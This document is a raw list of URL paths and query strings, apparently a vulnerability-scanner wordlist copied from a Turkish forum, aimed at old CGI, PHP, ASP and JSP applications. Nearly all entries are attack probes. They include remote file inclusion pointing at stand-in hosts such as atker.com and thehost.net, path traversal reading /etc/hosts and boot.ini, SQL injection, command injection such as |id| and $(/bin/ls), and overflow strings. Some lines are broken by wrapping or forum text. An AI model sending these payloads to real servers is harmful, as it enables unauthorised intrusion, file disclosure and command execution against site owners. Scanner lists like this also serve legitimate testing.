/admin/import/imp_rootdir.asp?result=1&www=C:\\&ftp=C:\\&owwwPath= C:\\&oftpPath=C:\\
/forum/action.php?action=activation&userid=346&code=35626 8007
/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\\boot.ini
/servlets/org.apache.cocoon.Cocoon
/cocoon/samples/welcome
/cocoon/view-source
/cocoon/status
/cocoon/
:3128/status.htm
:3128/mailbox.htm
/dbaccess.txt :
/include/oci8.php?inc_dir=http://www.atker.com&ext=txt
/include/postgres65.php?inc_dir= Linkleri Görebilmeniz için Üye Olmanız Gerekiyor. /include/mysql.php?inc_dir=http://www.atker.com&ext=txt
/include/mssql7.php?inc_dir= Linkleri Görebilmeniz için Üye Olmanız Gerekiyor. /include/msql.php?inc_dir=http://www.atker.com&ext=txt
/supporter/index.php?t=detailticket&id=root%20me
/supporter/index.php?t=editticket&id=got%20root
/supporter/index.php?t=updateticketlog&id=without%20me
/comment.php?mode=display&sid=foo&pid=;--injecthere&TiTle=hoschi
/cgi-bin/admin/admin.cgi?Admin=ImageFolio
/cgi-bin/admin/setup.cgi
/setup.cgi?todo=debug
/ticket.php?id=545
/cgi-bin/CSNews.cgi
/CSNews.cgi
/cgi-bin/makebook.cgi
/cgi-bin/rwcgi60.exe?test&report=
/cgi-bin/rwcgi60.sh?test&report=
/cgi-bin/rwcgi60.cgi?test&report=
/cgi-bin/rwcgi60?test&report=
/dev60cgi/rwcgi60.exe?test&report=
/dev60cgi/rwcgi60.sh?test&report=
/dev60cgi/rwcgi60.cgi?test&report=
/dev60cgi/rwcgi60?test&report=
/demos?sql=select+*+from+Customers+as+Customer+FOR+ XML+auto&root=root&xsl= custtable.xsl&contenttype=text/html
/Nwind/Template/catalog.xml?contenttype=text/overvlowhere
/_head.php?_zb_path=http://thehost.net/a\"
/board/_head.php?_zb_path=
/zboard/_head.php?_zb_path=http://thehost.net/a\"
/zeroboard/_head.php?_zb_path=http://thehost.net/a\"
/examples/jsp/view_source.jsp
/examples/jsp/source.jsp
/jsp/view_source.jsp
/view_source.jsp
/globals.php3?LangCookie=minetataa
/catalog/inludes/include_once.php?include_file=tataa
/install.php?phpbb_root_dir=myservertataa
/webMathematica/MSP?MSPStoreID=../../../../../etc/hosts&MSPStoreType=image/gif
/****cart/database/****cart.mdb
/database/****cart.mdb
/forum/admin/wwforum.mdb
/cgi-bin/webbbs/webbbs_config.pl?followup=|id|&name=100&email=
ldf@lasf.net&subject=dd&bOdy=dlaö/_login.jsp?login=\'-- and pass=\'--%00
/basilix.php
/cgi-bin/magiccard.cgi?pa=3Dpreview&next=3Dcustom& page=./../../../../../etc/hosts
/cgi-bin/update.dpgs
/update.dpgs
:8080/examples/basic/servlet/HelloServlet
:8080/examples/jsp/source.jsp
/cgi-bin/whois/whois.cgi
/cgi-bin/urlcount.cgi
/asgard/
/cgi-bin/faqmanager.cgi
/E-Guest_sign.pl
/cgi-bin/betsie/parserl.pl
/proplus/admin/login.php?action=insert&username=test&password=tes t
/horde/imp/login.php?1=1&imapuser=xss_script
/horde/turba/status.php
/horde/imp/mailbox.php?mailbox=/etc/hosts
/docmgmtout.php
/uploads/
/postbug.php
/anthill/postbug.php
/search?NS-query=tst&NS-query-pat=..\\..\\..\\..\\..\\boot.ini
/scripts/Carello/Carello.dll
/content/base/build/explorer/none.php?/etc/
/cgi-bin/pbcgi.cgi?name=tistname&email=
/pbcgi.cgi?name=tistname&email=
/main/cafenews.php
/ext.dll
/ext.ini.%00.txt
/accounts/getuserdesc.asp
/accounts/updateuserdesc.asp
/function_foot_1.inc.php
/cgi-bin/webmail/login/xxxyyyzzz.authdaemon
:6422/iiwiznew.asp
:6422/iiaction.asp
/cgi-bin/rwcgi60/
/cgi-bin/rwcgi60/showenv
/hd/winnt/system32/cmd.exe?/c+echo+hello
:444/splashAdmin.php
/search.php?search=a\'%20order%20by%20time%20desc% 3b%20qry
/search.php?search=a%\'%20order%20by%20time%20de sc%3b%20qry
/MWS/HandleSearch.html?searchTarget=morethan990bytesove rflow
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA AAAAAAAAAAAAAAAAAAAAAAA<!--htmltags-->
/scripts/wsm.phtml?searchboxinputname=|unixcommand
:32000/mail/addressaction.html
:32000/mail/readmail.html?folder=inbox&get=1&id=something
/php-affiliate/details2.php
/details2.php
/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows\\sys tem.ini
/error/HTTP_NOT_FOUND.html.var
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin .ini
/cgi-bin/%5c%2e%2e%5cbin%5cwintty.exe?%2dt+HELLO
/cgi-bin/%5c%2e%2e%5cbin%5cfile.exe?dir
/tmp_view.php?file=/etc/hosts
/adm/admbrowse.php?down=1&cur=%2Fetc%2F&dest=hosts&rid= 1&S=123
/shop/browse.asp
/shop/details.asp
/shop/showcat.asp/
/shop/users.asp,
/shop/cart.asp
/shop/newuser.asp
/browse.asp
/details.asp
/showcat.asp/
/users.asp,
/cart.asp
/newuser.asp
/settings
/list
/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin .ini
/%2f%2e%2e%2fcgi-bin/
/achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=anoth erhostfilewithcmd
/jsptest.jsp+
/jsptest.jsp\\
/filemanager/source.php?../../../../etc/hosts
/rpc.cgi
/graphs.php?action=edit&vertical_label=$(/bin/ls)
/scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini
/cgi-bin/db4web_c/dbdirname//etc/hosts
/modsecurity.php?inc_prefix=obox/htmlheader.php
/servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp
:8080/servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp
/modules.php?name=News&file=article&sid=1234%20or%2 01=1
/users.php?DATA=phpcode&then->/news.php3
/scripts/Carello/Carello.dll?CARELLOCODE=postthing&VBEXE=thisisit
/index.php?pymembs=admin
/db/users.dat
/admin/credit_card_info.php
/admin/upload.php
/showhits.php3?rel_path=http://another/main_********.inc
/checklogin.php?cfgProgDir=http://another/interface.php
/ss_admin.asp?Mode=Update&Acton=Access&UserName=pom mes&Password=frittes
/vbzoom/register.php
/VBZooM/add-subject.php?Success=1&FileName=localFile&FileName_ size=500&FileName_name=remoteFile
/VBZooM/download/
/web/msgError.asp?Redirect=login.htm&Reason=thingss
/web/usermgr/userlist.asp
/phpBB/phpinfo.php
/cgi-bin2/MsmMask.exe?mask=/file.ext
/phprank/update.php?page=update&name=zok&description=zok&si teurl=zok&banurl=zok&bh=42&bw=42&email=zok&spass=z ok&id=1033913918
